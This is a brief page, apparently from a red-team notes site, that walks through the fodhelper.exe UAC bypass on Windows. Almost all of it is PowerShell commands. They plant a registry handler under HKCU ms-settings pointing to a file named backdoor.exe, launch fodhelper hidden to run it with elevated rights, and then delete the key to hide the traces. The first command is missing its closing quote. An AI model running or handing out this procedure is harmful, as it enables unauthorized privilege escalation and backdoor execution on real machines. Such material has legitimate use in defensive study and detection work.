UAC Bypass
UAC Bypass technique I - fodhelper.exe
Procedure
PS> $command = "C:\Temp\backdoor.exe
PS> New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
PS> New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
PS> Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $command -Force
PS> Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
PS> Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -ForceTechnical Context
HKCU:\Software\Classes\ms-settings\shell\open\command
HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecuteAnalytic I
Reference
Last updated
